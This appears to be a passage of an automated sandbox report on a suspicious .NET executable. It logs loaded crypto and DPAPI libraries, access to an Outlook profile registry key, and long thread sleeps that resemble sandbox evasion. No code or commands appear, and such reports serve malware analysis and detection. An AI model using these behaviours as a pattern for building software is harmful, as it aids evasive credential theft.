Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006248000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdbP source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.pdbh source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Security.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdbMZ source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: Microsoft.VisualBasic.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Web.Extensions.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.000000000625D000.00000004.00000020.00020000.00000000.sdmp, WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.00000000061DE000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb\t source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdbSystem.ni.dllp source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC9C30 push esp; retf 00F3h 0_2_00EC9D55
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_067025C0 pushad ; iretd 0_2_06702701
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06708387 push es; iretd 0_2_067083AC
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_067079A3 push es; iretd 0_2_067079A4
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX (55 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (45 identical entries)
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Memory allocated: EC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Memory allocated: 2A80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Memory allocated: 4A80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599323
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598891
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598563
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598438
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598313
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598188
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598078
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597964
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597859
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597750
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597641
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597502
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597369
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597250
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597123
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597016
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596891
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596768
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596641
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596531
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596422
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596313
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596203
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596094
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595969
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595860
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595735
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595610
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595485
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595360
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595235
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595110
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594985
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594860
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594735
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594610
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594485
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594360
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594235
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Window / User API: threadDelayed 7879
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Window / User API: threadDelayed 1956
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 5944 Thread sleep count: 7879 > 30
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 5944 Thread sleep count: 1956 > 30
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599323s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598891s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598313s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598188s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597964s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597641s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597502s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597369s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597123s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596768s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596641s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596531s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596422s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596313s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596094s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595969s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595485s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594235s >= -30000s
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594985Jump to behavior
